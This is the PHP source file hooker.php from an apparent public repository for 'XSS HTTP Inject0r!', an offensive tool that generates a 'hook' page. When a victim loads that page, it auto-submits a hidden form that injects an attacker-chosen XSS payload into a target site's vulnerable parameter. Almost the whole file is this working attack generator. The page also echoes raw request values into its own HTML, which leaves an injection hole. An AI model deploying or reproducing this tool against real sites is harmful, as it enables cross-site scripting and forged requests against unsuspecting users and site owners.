Home Explore Help
Sign In
epsylon
/
xss-http-injector
Watch 1
Star 0
Fork 0
Files Issues 0 Pull Requests 0
Branch: master
Branches Tags
xss-http-inj...
/
hooker.php

hooker.php 3.5 KB
Permalink History Raw

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110 
  1. <?php
    2. 

  2. $target = $_REQUEST["target"];
    3. 

  3. $vulnerability = $_REQUEST["vulnerability"];
    4. 

  4. $injection = $_REQUEST["injection"];
    5. 

  5. ?>
    6. 

  6. <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
    7. 

  7. <head><title>XSS HTTP Inject0r!</title>
    8. 

  8. <meta http-equiv="content-type" content="text/html;charset=utf-8">
    9. 

  9. <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
    10. 

  10. <style type="text/css">
    11. 

  11. <!--
    12. 

  12. body,td,th {
    13. 

  13. color: #FFFFFF;
    14. 

  14. }
    15. 

  15. body {
    16. 

  16. background-color: #000000;
    17. 

  17. }
    18. 

  18. a {
    19. 

  19.  color:lime;
    20. 

  20. }
    21. 

  21. -->
    22. 

  22. </style>
    23. 

  23. <script type="text/javascript">
    24. 

  24. function SetUrl(frm){
    25. 

  25.     var ip = "<?php echo $_SERVER['SERVER_NAME']; ?>";
    26. 

  26.     var dir = "<?php echo preg_replace("/\?.*$/","",str_replace("hooker.php", "Index.html", $_SERVER['REQUEST_URI'])); ?>";
    27. 

  27.     alert("HOOK's URL: " +ip+dir);
    28. 

  28. }
    29. 

  29. </script>
    30. 

  30. <?php
    31. 

  31. if(isset($_REQUEST['generate']))
    32. 

  32. {
    33. 

  33.   generate();
    34. 

  34. }
    35. 

  35. ?>
    36. 

  36. </head>
    37. 

  37. <body>
    38. 

  38. <center>
    39. 

  39. <br />| <a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a> |<br /><br />
    40. 

  40. <img src="images/pwned.jpg" width="350" height="203" border="1"><br />
    41. 

  41. 'Hook' targets to execute XSS exploits on their browsers... |<a href="index.html">Back</a>|<br /><br />
    42. 

  42. <form method="POST" name="hook_frm">
    43. 

  43. <table border="1">
    44. 

  44.  <tr>
    45. 

  45.   <td>1-</td>
    46. 

  46.   <td>
    47. 

  47.    <table>
    48. 

  48.     <tr>
    49. 

  49.      <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" value='<?php echo $target;?>' size="35" readonly></td>
    50. 

  50.     </tr>
    51. 

  51.     <tr>
    52. 

  52.      <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" value='<?php echo $vulnerability;?>' readonly></td>
    53. 

  53.     </tr>
    54. 

  54.     <tr>
    55. 

  55.      <td><u>Injection</u> (Code to inject):</td><td><textarea name="injection" cols="40" rows="1" readonly><?php echo ($injection);?></textarea></td>
    56. 

  56.     </tr>
    57. 

  57.     <tr>
    58. 

  58.      <td><u>Method</u> (GET/POST):</td><td><input type="text" name="method" value='<?php echo $_REQUEST["method"];?>' readonly></td>
    59. 

  59.     </tr>
    60. 

  60.    </table>
    61. 

  61.   </td>
    62. 

  62.  </tr>
    63. 

  63.  <tr>
    64. 

  64.   <td>2-</td>
    65. 

  65.   <td>
    66. 

  66.    <table>
    67. 

  67.     <tr>
    68. 

  68.      <td><u>File</u>:</td><td>Index.html</td>
    69. 

  69.     </tr>
    70. 

  70.    </table>
    71. 

  71.   </td>
    72. 

  72.  </tr>
    73. 

  73.  <tr>
    74. 

  74.   <td>3-</td><td><center><br /><input type="submit" value="Generate Hook!" name="generate" onclick="javascript:SetUrl();" style="padding: 10px; font-weight:bold;"><br /><br /></center></td>
    75. 

  75.  </tr>
    76. 

  76. </table>
    77. 

  77. </form>
    78. 

  78. <?php
    79. 

  79. function generate()
    80. 

  80. {
    81. 

  81. $target = $_REQUEST["target"];
    82. 

  82. $vulnerability = $_REQUEST["vulnerability"];
    83. 

  83. $injection = utf8_decode($_REQUEST["injection"]);
    84. 

  84. $injection = htmlentities($injection, ENT_QUOTES);
    85. 

  85. $sHTML_Header = "<html><head><title></title><meta http-equiv='content-type' content='text/html;charset=utf-8'><script>function xss(){document.f.s.click();}</script></head>";
    86. 

  86. $sHTML_Content = "<body onload='xss();'><form method='".$_REQUEST['method']."' name='f' action='$target'><input name='$vulnerability' value='$injection'><input type='submit' name='s'></form>";
    87. 

  87. $sHTML_Footer =  "</body></html>";
    88. 

  88. $filename = "Index.html"; // this is the filename of the archive ('hook') generated on your server.
    89. 

  89. if (is_writable(getcwd())) {
    90. 

  90.    IF (!$handle = fopen($filename, 'w')) {
    91. 

  91.          echo "Cannot open file ($filename)";
    92. 

  92.          exit;
    93. 

  93.    }
    94. 

  94.    if (fwrite($handle, $sHTML_Header) === FALSE) {
    95. 

  95.        echo "Cannot write to file ($filename)";
    96. 

  96.        exit;
    97. 

  97.    }else{
    98. 

  98.       fwrite($handle, $sHTML_Content);
    99. 

  99.       fwrite($handle, $sHTML_Footer);
    100. 

  100.    }
    101. 

  101.    fclose($handle);
    102. 

  102. }else{
    103. 

  103.    echo "The file $filename is not writable (use: chown www-data:www-data $filename)";
    104. 

  104. }
    105. 

  105. }
    106. 

  106. ?>
    107. 

  107. </center>
    108. 

  108. </body>
    109. 

  109. </html>
    110. 

  110.